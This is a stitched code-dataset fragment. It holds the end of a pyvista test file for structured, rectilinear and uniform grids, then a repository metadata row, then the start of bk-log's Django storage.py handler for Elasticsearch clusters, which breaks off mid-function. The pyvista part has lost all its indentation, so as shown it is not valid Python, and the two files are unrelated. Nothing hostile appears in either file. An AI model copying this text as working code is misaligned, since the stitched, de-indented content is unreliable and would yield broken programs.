z = z[:, :, :2]
with pytest.raises(ValueError):
grid = pyvista.StructuredGrid(x, y, z)
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.pointset.StructuredGrid._WRITERS)
def test_save_structured(extension, binary, tmpdir, struct_grid):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
struct_grid.save(filename, binary)
grid = pyvista.StructuredGrid(filename)
assert grid.x.shape == struct_grid.y.shape
assert grid.n_cells
assert grid.points.shape == struct_grid.points.shape
grid = pyvista.read(filename)
assert grid.x.shape == struct_grid.y.shape
assert grid.n_cells
assert grid.points.shape == struct_grid.points.shape
assert isinstance(grid, pyvista.StructuredGrid)
def test_load_structured_bad_filename():
with pytest.raises(FileNotFoundError):
pyvista.StructuredGrid('not a file')
filename = os.path.join(test_path, 'test_grid.py')
with pytest.raises(ValueError):
grid = pyvista.StructuredGrid(filename)
def test_create_rectilinear_grid_from_specs():
# 3D example
xrng = np.arange(-10, 10, 2)
yrng = np.arange(-10, 10, 5)
zrng = np.arange(-10, 10, 1)
grid = pyvista.RectilinearGrid(xrng)
assert grid.n_cells == 9
assert grid.n_points == 10
grid = pyvista.RectilinearGrid(xrng, yrng)
assert grid.n_cells == 9*3
assert grid.n_points == 10*4
grid = pyvista.RectilinearGrid(xrng, yrng, zrng)
assert grid.n_cells == 9*3*19
assert grid.n_points == 10*4*20
assert grid.bounds == [-10.0,8.0, -10.0,5.0, -10.0,9.0]
# 2D example
cell_spacings = np.array([1., 1., 2., 2., 5., 10.])
x_coordinates = np.cumsum(cell_spacings)
y_coordinates = np.cumsum(cell_spacings)
grid = pyvista.RectilinearGrid(x_coordinates, y_coordinates)
assert grid.n_cells == 5*5
assert grid.n_points == 6*6
assert grid.bounds == [1.,21., 1.,21., 0.,0.]
def test_create_rectilinear_after_init():
x = np.array([0,1,2])
y = np.array([0,5,8])
z = np.array([3,2,1])
grid = pyvista.RectilinearGrid()
grid.x = x
assert grid.dimensions == [3, 1, 1]
grid.y = y
assert grid.dimensions == [3, 3, 1]
grid.z = z
assert grid.dimensions == [3, 3, 3]
assert np.allclose(grid.x, x)
assert np.allclose(grid.y, y)
assert np.allclose(grid.z, z)
def test_create_rectilinear_grid_from_file():
grid = examples.load_rectilinear()
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_read_rectilinear_grid_from_file():
grid = pyvista.read(examples.rectfile)
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0,1350.0, -400.0,1350.0, -850.0,0.0]
assert grid.n_arrays == 1
def test_read_rectilinear_grid_from_pathlib():
grid = pyvista.RectilinearGrid(pathlib.Path(examples.rectfile))
assert grid.n_cells == 16146
assert grid.n_points == 18144
assert grid.bounds == [-350.0, 1350.0, -400.0, 1350.0, -850.0, 0.0]
assert grid.n_arrays == 1
def test_cast_rectilinear_grid():
grid = pyvista.read(examples.rectfile)
structured = grid.cast_to_structured_grid()
assert isinstance(structured, pyvista.StructuredGrid)
assert structured.n_points == grid.n_points
assert structured.n_cells == grid.n_cells
assert np.allclose(structured.points, grid.points)
for k, v in grid.point_arrays.items():
assert np.allclose(structured.point_arrays[k], v)
for k, v in grid.cell_arrays.items():
assert np.allclose(structured.cell_arrays[k], v)
def test_create_uniform_grid_from_specs():
# create UniformGrid
dims = [10, 10, 10]
grid = pyvista.UniformGrid(dims) # Using default spacing and origin
assert grid.dimensions == [10, 10, 10]
assert grid.extent == [0, 9, 0, 9, 0, 9]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [1.0, 1.0, 1.0]
spacing = [2, 1, 5]
grid = pyvista.UniformGrid(dims, spacing) # Using default origin
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [0.0, 0.0, 0.0]
assert grid.spacing == [2.0, 1.0, 5.0]
origin = [10, 35, 50]
grid = pyvista.UniformGrid(dims, spacing, origin) # Everything is specified
assert grid.dimensions == [10, 10, 10]
assert grid.origin == [10.0, 35.0, 50.0]
assert grid.spacing == [2.0, 1.0, 5.0]
assert grid.dimensions == [10, 10, 10]
def test_uniform_setters():
grid = pyvista.UniformGrid()
grid.dimensions = [10, 10, 10]
assert grid.GetDimensions() == (10, 10, 10)
assert grid.dimensions == [10, 10, 10]
grid.spacing = [5, 2, 1]
assert grid.GetSpacing() == (5, 2, 1)
assert grid.spacing == [5, 2, 1]
grid.origin = [6, 27.7, 19.8]
assert grid.GetOrigin() == (6, 27.7, 19.8)
assert grid.origin == [6, 27.7, 19.8]
def test_create_uniform_grid_from_file():
grid = examples.load_uniform()
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_read_uniform_grid_from_file():
grid = pyvista.read(examples.uniformfile)
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0,9.0, 0.0,9.0, 0.0,9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_read_uniform_grid_from_pathlib():
grid = pyvista.UniformGrid(pathlib.Path(examples.uniformfile))
assert grid.n_cells == 729
assert grid.n_points == 1000
assert grid.bounds == [0.0, 9.0, 0.0, 9.0, 0.0, 9.0]
assert grid.n_arrays == 2
assert grid.dimensions == [10, 10, 10]
def test_cast_uniform_to_structured():
grid = examples.load_uniform()
structured = grid.cast_to_structured_grid()
assert structured.n_points == grid.n_points
assert structured.n_arrays == grid.n_arrays
assert structured.bounds == grid.bounds
def test_cast_uniform_to_rectilinear():
grid = examples.load_uniform()
rectilinear = grid.cast_to_rectilinear_grid()
assert rectilinear.n_points == grid.n_points
assert rectilinear.n_arrays == grid.n_arrays
assert rectilinear.bounds == grid.bounds
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.core.grid.RectilinearGrid._READERS)
def test_save_rectilinear(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_rectilinear()
ogrid.save(filename, binary)
grid = pyvista.RectilinearGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.RectilinearGrid)
assert grid.n_cells == ogrid.n_cells
assert np.allclose(grid.x, ogrid.x)
assert np.allclose(grid.y, ogrid.y)
assert np.allclose(grid.z, ogrid.z)
assert grid.dimensions == ogrid.dimensions
@pytest.mark.parametrize('binary', [True, False])
@pytest.mark.parametrize('extension', pyvista.core.grid.UniformGrid._READERS)
def test_save_uniform(extension, binary, tmpdir):
filename = str(tmpdir.mkdir("tmpdir").join('tmp.%s' % extension))
ogrid = examples.load_uniform()
ogrid.save(filename, binary)
grid = pyvista.UniformGrid(filename)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
grid = pyvista.read(filename)
assert isinstance(grid, pyvista.UniformGrid)
assert grid.n_cells == ogrid.n_cells
assert grid.origin == ogrid.origin
assert grid.spacing == ogrid.spacing
assert grid.dimensions == ogrid.dimensions
def test_grid_points():
"""Test the points methods on UniformGrid and RectilinearGrid"""
# test creation of 2d grids
x = y = range(3)
z = [0,]
xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')
points = np.c_[xx.ravel(order='F'), yy.ravel(order='F'), zz.ravel(order='F')]
grid = pyvista.UniformGrid()
with pytest.raises(AttributeError):
grid.points = points
grid.origin = (0.0, 0.0, 0.0)
grid.dimensions = (3, 3, 1)
grid.spacing = (1, 1, 1)
assert grid.n_points == 9
assert grid.n_cells == 4
assert np.allclose(grid.points, points)
points = np.array([[0, 0, 0],
[1, 0, 0],
[1, 1, 0],
[0, 1, 0],
[0, 0, 1],
[1, 0, 1],
[1, 1, 1],
[0, 1, 1]])
grid = pyvista.UniformGrid()
grid.dimensions = [2, 2, 2]
grid.spacing = [1, 1, 1]
grid.origin = [0., 0., 0.]
assert np.allclose(np.unique(grid.points, axis=0), np.unique(points, axis=0))
opts = np.c_[grid.x, grid.y, grid.z]
assert np.allclose(np.unique(opts, axis=0), np.unique(points, axis=0))
# Now test rectilinear grid
grid = pyvista.RectilinearGrid()
with pytest.raises(AttributeError):
grid.points = points
x, y, z = np.array([0, 1, 3]), np.array([0, 2.5, 5]), np.array([0, 1])
xx, yy, zz = np.meshgrid(x, y, z, indexing='ij')
grid.x = x
grid.y = y
grid.z = z
assert grid.dimensions == [3, 3, 2]
assert np.allclose(grid.meshgrid, (xx, yy, zz))
assert np.allclose(grid.points, np.c_[xx.ravel(order='F'), yy.ravel(order='F'), zz.ravel(order='F')])
def test_grid_extract_selection_points(struct_grid):
grid = pyvista.UnstructuredGrid(struct_grid)
sub_grid = grid.extract_points([0])
assert sub_grid.n_cells == 1
sub_grid = grid.extract_points(range(100))
assert sub_grid.n_cells > 1
def test_gaussian_smooth(hexbeam):
uniform = examples.load_uniform()
active = uniform.active_scalars_name
values = uniform.active_scalars
uniform = uniform.gaussian_smooth(scalars=active)
assert uniform.active_scalars_name == active
assert uniform.active_scalars.shape == values.shape
assert not np.all(uniform.active_scalars == values)
values = uniform.active_scalars
uniform = uniform.gaussian_smooth(radius_factor=5, std_dev=1.3)
assert uniform.active_scalars_name == active
assert uniform.active_scalars.shape == values.shape
assert not np.all(uniform.active_scalars == values)
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
HEXBEAM_CELLS_BOOL])
def test_remove_cells(ind, hexbeam):
grid_copy = hexbeam.copy()
grid_copy.remove_cells(ind)
assert grid_copy.n_cells < hexbeam.n_cells
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
HEXBEAM_CELLS_BOOL])
def test_remove_cells_not_inplace(ind, hexbeam):
grid_copy = hexbeam.copy() # copy to protect
grid_w_removed = grid_copy.remove_cells(ind, inplace=False)
assert grid_w_removed.n_cells < hexbeam.n_cells
assert grid_copy.n_cells == hexbeam.n_cells
def test_remove_cells_invalid(hexbeam):
grid_copy = hexbeam.copy()
with pytest.raises(ValueError):
grid_copy.remove_cells(np.ones(10, np.bool_))
@pytest.mark.parametrize('ind', [range(10), np.arange(10),
STRUCTGRID_CELLS_BOOL])
def test_hide_cells(ind, struct_grid):
sgrid_copy = struct_grid.copy()
sgrid_copy.hide_cells(ind)
assert sgrid_copy.HasAnyBlankCells()
| 33.249597 | 105 | 0.649651 |
5eb3521837976c52bee8c1b7b77beb247e2debbc | 29,648 | py | Python | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 75 | 2021-07-14T09:32:36.000Z | 2022-03-31T15:26:53.000Z | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 561 | 2021-07-14T07:45:47.000Z | 2022-03-31T11:41:28.000Z | apps/log_databus/handlers/storage.py | ptaoapeng/bk-log | f54735a21ecea4e90c5ac2f5dbc0be13d0b9ab80 | [
"MIT"
] | 41 | 2021-07-14T07:39:50.000Z | 2022-03-25T09:22:18.000Z | # -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import functools
import re
import socket
from collections import defaultdict
from typing import Union, List
import arrow
from django.conf import settings
from django.utils.translation import ugettext as _
from django.db.models import Sum
from elasticsearch import Elasticsearch
from apps.log_databus.utils.es_config import get_es_config
from apps.utils.log import logger
from apps.utils.thread import MultiExecuteFunc
from apps.constants import UserOperationTypeEnum, UserOperationActionEnum
from apps.iam import Permission, ResourceEnum
from apps.log_esquery.utils.es_route import EsRoute
from apps.log_search.models import Scenario, ProjectInfo
from apps.utils.cache import cache_five_minute
from apps.utils.local import get_local_param, get_request_username
from apps.api import TransferApi, BkLogApi
from apps.log_databus.models import StorageCapacity, StorageUsed, DataLinkConfig
from apps.log_databus.constants import (
STORAGE_CLUSTER_TYPE,
REGISTERED_SYSTEM_DEFAULT,
DEFAULT_ES_SCHEMA,
NODE_ATTR_PREFIX_BLACKLIST,
BKLOG_RESULT_TABLE_PATTERN,
EsSourceType,
)
from apps.log_databus.exceptions import (
StorageNotExistException,
StorageNotPermissionException,
StorageConnectInfoException,
StorageUnKnowEsVersionException,
StorageHaveResource,
)
from apps.decorators import user_operation_record
from apps.utils.time_handler import format_user_time_zone
CACHE_EXPIRE_TIME = 300
class StorageHandler(object):
def __init__(self, cluster_id=None):
self.cluster_id = cluster_id
super().__init__()
def get_cluster_groups(self, bk_biz_id, is_default=True):
"""
获取集群列表
:param bk_biz_id:
:param is_default:
:return:
"""
cluster_groups = self.filter_cluster_groups(
TransferApi.get_cluster_info({"cluster_type": STORAGE_CLUSTER_TYPE}), bk_biz_id, is_default=is_default
)
return [
{
"storage_cluster_id": i["cluster_config"].get("cluster_id"),
"storage_cluster_name": i["cluster_config"].get("cluster_name"),
"storage_version": i["cluster_config"].get("version"),
"storage_type": STORAGE_CLUSTER_TYPE,
"priority": i["priority"],
"registered_system": i["cluster_config"].get("registered_system"),
"bk_biz_id": i["bk_biz_id"],
"enable_hot_warm": i["cluster_config"]["custom_option"]
.get("hot_warm_config", {})
.get("is_enabled", False),
}
for i in cluster_groups
if i
]
def get_cluster_groups_filter(self, bk_biz_id, is_default=True, data_link_id=0):
"""
获取集群列表并过滤
:param bk_biz_id:
:param is_default:
:param data_link_id: 链路ID
:return:
"""
cluster_groups = self.get_cluster_groups(bk_biz_id, is_default=is_default)
if data_link_id:
# 如果传了链路ID,则根据链路ID过滤
link_object = DataLinkConfig.objects.filter(data_link_id=data_link_id).first()
if link_object:
es_list = link_object.es_cluster_ids
else:
es_list = []
# 如果集群不是公共集群,则不过滤
cluster_groups = [
c
for c in cluster_groups
if c["storage_cluster_id"] in es_list or c.get("registered_system") != REGISTERED_SYSTEM_DEFAULT
]
# 排序:第三方集群 > 默认集群
cluster_groups.sort(key=lambda c: c["priority"])
# 获取公共集群使用情况
public_clusters = [
cluster["storage_cluster_id"]
for cluster in cluster_groups
if cluster.get("registered_system") == REGISTERED_SYSTEM_DEFAULT
]
if not public_clusters:
return cluster_groups
es_config = get_es_config(bk_biz_id)
# 获取公共集群容易配额
storage_capacity = self.get_storage_capacity(bk_biz_id, public_clusters)
for cluster in cluster_groups:
if cluster.get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
cluster["storage_capacity"] = storage_capacity["storage_capacity"]
cluster["storage_used"] = storage_capacity["storage_used"]
cluster["max_retention"] = es_config["ES_PUBLIC_STORAGE_DURATION"]
else:
cluster["storage_capacity"] = 0
cluster["storage_used"] = 0
cluster["max_retention"] = es_config["ES_PRIVATE_STORAGE_DURATION"]
return cluster_groups
@classmethod
def filter_cluster_groups(cls, cluster_groups, bk_biz_id, is_default=True):
"""
筛选集群,并判断集群是否可编辑
:param cluster_groups:
:param bk_biz_id:
:param is_default:
:return:
"""
cluster_data = list()
projects = ProjectInfo.get_cmdb_projects()
# 筛选集群 & 判断是否可编辑
for cluster_obj in cluster_groups:
cluster_obj["cluster_config"]["create_time"] = StorageHandler.convert_standard_time(
cluster_obj["cluster_config"]["create_time"]
)
cluster_obj["cluster_config"]["last_modify_time"] = StorageHandler.convert_standard_time(
cluster_obj["cluster_config"]["last_modify_time"]
)
cluster_obj["cluster_config"]["schema"] = cluster_obj["cluster_config"].get("schema") or DEFAULT_ES_SCHEMA
enable_hot_warm = (
cluster_obj["cluster_config"]["custom_option"].get("hot_warm_config", {}).get("is_enabled", False)
)
cluster_obj["cluster_config"]["enable_hot_warm"] = enable_hot_warm
es_config = get_es_config(bk_biz_id)
# 公共集群:凭据信息和域名置空处理,并添加不允许编辑标签
if cluster_obj["cluster_config"].get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
if not is_default:
continue
cluster_obj.update({"auth_info": {"username": "", "password": ""}, "is_editable": False})
cluster_obj["cluster_config"]["domain_name"] = ""
cluster_obj["cluster_config"]["max_retention"] = es_config["ES_PUBLIC_STORAGE_DURATION"]
# 默认集群权重:推荐集群 > 其他
cluster_obj["priority"] = 1 if cluster_obj["cluster_config"].get("is_default_cluster") else 2
cluster_obj["bk_biz_id"] = 0
cluster_data.append(cluster_obj)
continue
# 非公共集群, 筛选bk_biz_id,密码置空处理,并添加可编辑标签
custom_option = cluster_obj["cluster_config"]["custom_option"]
custom_biz_id = custom_option.get("bk_biz_id")
custom_visible_bk_biz = custom_option.get("visible_bk_biz", [])
cluster_obj["cluster_config"]["max_retention"] = es_config["ES_PRIVATE_STORAGE_DURATION"]
if not cls.storage_visible(bk_biz_id, custom_biz_id, custom_visible_bk_biz):
continue
cluster_obj["is_editable"] = True
cluster_obj["auth_info"]["password"] = ""
# 第三方es权重最高
cluster_obj["priority"] = 0
cluster_obj["bk_biz_id"] = custom_biz_id
from apps.log_search.handlers.index_set import IndexSetHandler
index_sets = IndexSetHandler.get_index_set_for_storage(cluster_obj["cluster_config"]["cluster_id"])
cluster_obj["visible_bk_biz"] = [
{
"bk_biz_id": bk_biz_id,
"is_use": index_sets.filter(project_id=projects.get(bk_biz_id), is_active=True).exists(),
}
for bk_biz_id in custom_visible_bk_biz
]
# 处理来源
cluster_obj["source_type"] = custom_option.get("source_type", EsSourceType.PRIVATE.value)
cluster_obj["source_name"] = (
custom_option.get("source_name")
if cluster_obj["source_type"] == EsSourceType.OTHER.value
else EsSourceType.get_choice_label(cluster_obj["source_type"])
)
cluster_data.append(cluster_obj)
return cluster_data
@staticmethod
def storage_visible(bk_biz_id, custom_bk_biz_id, visible_bk_biz: List[int]) -> bool:
bk_biz_id = int(bk_biz_id)
if bk_biz_id in visible_bk_biz:
return True
if not custom_bk_biz_id:
return False
custom_bk_biz_id = int(custom_bk_biz_id)
return custom_bk_biz_id == bk_biz_id
@staticmethod
def convert_standard_time(time_stamp):
try:
time_zone = get_local_param("time_zone")
return arrow.get(int(time_stamp)).to(time_zone).strftime("%Y-%m-%d %H:%M:%S%z")
except Exception: # pylint: disable=broad-except
return time_stamp
def list(self, bk_biz_id, cluster_id=None, is_default=True):
"""
存储集群列表
:return:
"""
params = {"cluster_type": STORAGE_CLUSTER_TYPE}
if cluster_id:
params["cluster_id"] = cluster_id
cluster_info = TransferApi.get_cluster_info(params)
if cluster_id:
cluster_info = self._get_cluster_nodes(cluster_info)
cluster_info = self._get_cluster_detail_info(cluster_info)
return self.filter_cluster_groups(cluster_info, bk_biz_id, is_default)
def _get_cluster_nodes(self, cluster_info: List[dict]):
for cluster in cluster_info:
cluster_id = cluster.get("cluster_config").get("cluster_id")
nodes_stats = EsRoute(
scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
).cluster_nodes_stats()
if not nodes_stats:
cluster["nodes"] = []
continue
cluster["nodes"] = [
{
"tag": node.get("attributes", {}).get("tag", ""),
"attributes": node.get("attributes"),
"name": node["name"],
"ip": node["ip"],
"host": node["host"],
"roles": node["roles"],
"mem_total": node["os"]["mem"]["total_in_bytes"],
"store_total": node["fs"]["total"]["total_in_bytes"],
}
for node in nodes_stats["nodes"].values()
]
return cluster_info
def _get_cluster_detail_info(self, cluster_info: List[dict]):
multi_execute_func = MultiExecuteFunc()
def get_cluster_stats(cluster_id: int):
return EsRoute(
scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
).cluster_stats()
for cluster in cluster_info:
cluster_id = cluster.get("cluster_config").get("cluster_id")
multi_execute_func.append(cluster_id, get_cluster_stats, cluster_id)
result = multi_execute_func.run()
for cluster in cluster_info:
cluster_id = cluster.get("cluster_config").get("cluster_id")
cluster_stats = result.get(cluster_id)
cluster["cluster_stats"] = cluster_stats
return cluster_info
def create(self, params):
"""
创建集群
:param params:
:return:
"""
bk_biz_id = int(params["custom_option"]["bk_biz_id"])
es_source_id = TransferApi.create_cluster_info(params)
# add user_operation_record
operation_record = {
"username": get_request_username(),
"biz_id": bk_biz_id,
"record_type": UserOperationTypeEnum.STORAGE,
"record_object_id": int(es_source_id),
"action": UserOperationActionEnum.CREATE,
"params": params,
}
user_operation_record.delay(operation_record)
Permission().grant_creator_action(
resource=ResourceEnum.ES_SOURCE.create_simple_instance(
es_source_id, attribute={"name": params["cluster_name"]}
)
)
return es_source_id
def update(self, params):
"""
更新集群
:param params:
:return:
"""
# 判断是否可编辑
bk_biz_id = int(params["custom_option"]["bk_biz_id"])
get_cluster_info_params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
cluster_objs = TransferApi.get_cluster_info(get_cluster_info_params)
if not cluster_objs:
raise StorageNotExistException()
# 判断该集群是否可编辑
if cluster_objs[0]["cluster_config"].get("registered_system") == REGISTERED_SYSTEM_DEFAULT:
raise StorageNotPermissionException()
# 判断该集群是否属于该业务
if cluster_objs[0]["cluster_config"]["custom_option"].get("bk_biz_id") != bk_biz_id:
raise StorageNotPermissionException()
# 当前端传入的账号或密码为空时,取原账号密码
if not params["auth_info"]["username"] or not params["auth_info"]["password"]:
params["auth_info"]["username"] = cluster_objs[0]["auth_info"]["username"]
params["auth_info"]["password"] = cluster_objs[0]["auth_info"]["password"]
BkLogApi.connectivity_detect(
params={
"bk_biz_id": bk_biz_id,
"domain_name": params["domain_name"],
"port": params["port"],
"schema": params["schema"],
"cluster_id": self.cluster_id,
"es_auth_info": {
"username": params["auth_info"]["username"],
"password": params["auth_info"]["password"],
},
},
)
cluster_obj = TransferApi.modify_cluster_info(params)
cluster_obj["auth_info"]["password"] = ""
# add user_operation_record
operation_record = {
"username": get_request_username(),
"biz_id": bk_biz_id,
"record_type": UserOperationTypeEnum.STORAGE,
"record_object_id": self.cluster_id,
"action": UserOperationActionEnum.UPDATE,
"params": params,
}
user_operation_record.delay(operation_record)
return cluster_obj
def destroy(self):
from apps.log_search.handlers.index_set import IndexSetHandler
# check index_set
index_sets = IndexSetHandler.get_index_set_for_storage(self.cluster_id)
if index_sets.filter(is_active=True).exists():
raise StorageHaveResource
# TODO 检查计算平台关联的集群
TransferApi.delete_cluster_info({"cluster_id": self.cluster_id})
def connectivity_detect(
self,
bk_biz_id,
domain_name=None,
port=None,
username=None,
password=None,
version_info=False,
default_auth=False,
schema=DEFAULT_ES_SCHEMA,
**kwargs,
):
# 有传用户但是没有密码,通过接口查询该cluster密码信息
# version_info 为True,会返回连接状态和版本信息的元组,False只返回连接状态bool
if self.cluster_id:
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
clusters = TransferApi.get_cluster_info(params)
# 判断集群信息是否存在,及是否有读取改集群信息权限
if not clusters:
raise StorageNotExistException()
cluster_obj = clusters[0]
# 比较集群bk_biz_id是否匹配
cluster_config = cluster_obj["cluster_config"]
custom_option = cluster_config.get("custom_option", {})
custom_biz_id = custom_option.get("bk_biz_id")
if custom_biz_id:
if custom_biz_id != bk_biz_id:
raise StorageNotPermissionException()
# 集群不可以修改域名、端口
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
# 现有集群用户不修改密码则使用集群现有密码
if username and not password:
password = cluster_obj["auth_info"]["password"]
# 兼容批量连通性测试,使用存储凭据信息
if default_auth:
username = cluster_obj["auth_info"].get("username")
password = cluster_obj["auth_info"].get("password")
# 新增批量获取状态时schema
schema = cluster_config.get("schema") or DEFAULT_ES_SCHEMA
connect_result = self._send_detective(domain_name, port, username, password, version_info, schema)
return connect_result
def list_node_attrs(
self,
bk_biz_id,
domain_name=None,
port=None,
username=None,
password=None,
default_auth=False,
schema=DEFAULT_ES_SCHEMA,
**kwargs,
):
"""
获取集群各节点的属性
"""
# 有传用户但是没有密码,通过接口查询该cluster密码信息
if self.cluster_id:
params = {"cluster_type": STORAGE_CLUSTER_TYPE, "cluster_id": int(self.cluster_id)}
cluster_obj = TransferApi.get_cluster_info(params)[0]
# 判断集群信息是否存在,及是否有读取改集群信息权限
if not cluster_obj:
raise StorageNotExistException()
# 比较集群bk_biz_id是否匹配
cluster_config = cluster_obj["cluster_config"]
custom_option = cluster_config.get("custom_option", {})
custom_biz_id = custom_option.get("bk_biz_id")
if custom_biz_id:
if int(custom_biz_id) != int(bk_biz_id):
raise StorageNotPermissionException()
# 集群不可以修改域名、端口
domain_name = cluster_config["domain_name"]
port = cluster_config["port"]
# 现有集群用户不修改密码则使用集群现有密码
if username and not password:
password = cluster_obj["auth_info"]["password"]
# 兼容批量连通性测试,使用存储凭据信息
if default_auth:
username = cluster_obj["auth_info"].get("username")
password = cluster_obj["auth_info"].get("password")
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
[domain_name], http_auth=http_auth, scheme=schema, port=port, sniffer_timeout=600, verify_certs=True
)
nodes = es_client.cat.nodeattrs(format="json", h="name,host,attr,value,id,ip")
# 对节点属性进行过滤,有些是内置的,需要忽略
filtered_nodes = []
for node in nodes:
for prefix in NODE_ATTR_PREFIX_BLACKLIST:
if node["attr"].startswith(prefix):
break
else:
filtered_nodes.append(node)
return filtered_nodes
@classmethod
def batch_connectivity_detect(cls, cluster_list, bk_biz_id):
"""
:param cluster_list:
:return:
"""
multi_execute_func = MultiExecuteFunc()
for _cluster_id in cluster_list:
multi_execute_func.append(
_cluster_id, cls._get_cluster_status_and_stats, {"cluster_id": _cluster_id, "bk_biz_id": bk_biz_id}
)
return multi_execute_func.run()
@staticmethod
def _get_cluster_status_and_stats(params):
@cache_five_minute("connect_info_{cluster_id}")
def _cache_status_and_stats(*, cluster_id, bk_biz_id):
cluster_stats_info = None
try:
_status = BkLogApi.connectivity_detect(
params={"bk_biz_id": bk_biz_id, "cluster_id": cluster_id, "default_auth": True},
)
cluster_stats = EsRoute(
scenario_id=Scenario.ES, storage_cluster_id=cluster_id, raise_exception=False
).cluster_stats()
if cluster_stats:
cluster_stats_info = StorageHandler._build_cluster_stats(cluster_stats)
except Exception as e: # pylint: disable=broad-except
logger.error(f"[storage] get cluster status failed => [{e}]")
_status = False
return {"status": _status, "cluster_stats": cluster_stats_info}
cluster_id = params.get("cluster_id")
bk_biz_id = params.get("bk_biz_id")
return _cache_status_and_stats(cluster_id=cluster_id, bk_biz_id=bk_biz_id)
@staticmethod
def _build_cluster_stats(cluster_stats):
return {
"node_count": cluster_stats["nodes"]["count"]["total"],
"shards_total": cluster_stats["indices"]["shards"]["total"],
"shards_pri": cluster_stats["indices"]["shards"]["primaries"],
"data_node_count": cluster_stats["nodes"]["count"]["data"],
"indices_count": cluster_stats["indices"]["count"],
"indices_docs_count": cluster_stats["indices"]["docs"]["count"],
"indices_store": cluster_stats["indices"]["store"]["size_in_bytes"],
"total_store": cluster_stats["nodes"]["fs"]["total_in_bytes"],
"status": cluster_stats["status"],
}
def _send_detective(
self, domain_name: str, port: int, username="", password="", version_info=False, schema=DEFAULT_ES_SCHEMA
) -> Union[bool, tuple]:
# 对host和port的连通性进行验证
cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
es_address = (str(domain_name), int(port))
cs.settimeout(2)
try:
status = cs.connect_ex(es_address)
# this status is returnback from tcpserver
if status != 0:
raise StorageConnectInfoException(
StorageConnectInfoException.MESSAGE.format(info=_("IP or PORT can not be reached"))
)
except Exception as e: # pylint: disable=broad-except
raise StorageConnectInfoException(
StorageConnectInfoException.MESSAGE.format(info=_("IP or PORT can not be reached, %s" % e))
)
cs.close()
http_auth = (username, password) if username and password else None
es_client = Elasticsearch(
[domain_name], http_auth=http_auth, scheme=schema, port=port, sniffer_timeout=600, verify_certs=True
)
if not es_client.ping():
connect_result = False
else:
connect_result = True
if not version_info:
return connect_result
else:
if connect_result:
info_dict = es_client.info()
version_number: str = self.dump_version_info(info_dict, domain_name, port)
return connect_result, version_number
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
def dump_version_info(self, info_dict: dict, domain_name: str, port: int) -> str:
if info_dict:
version = info_dict.get("version")
if version:
number = version.get("number")
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
else:
raise StorageUnKnowEsVersionException(
StorageUnKnowEsVersionException.MESSAGE.format(ip=domain_name, port=port)
)
return number
def get_cluster_info_by_id(self):
"""
根据集群ID查询集群信息,密码返回
:return:
"""
cluster_info = TransferApi.get_cluster_info({"cluster_id": self.cluster_id})
if not cluster_info:
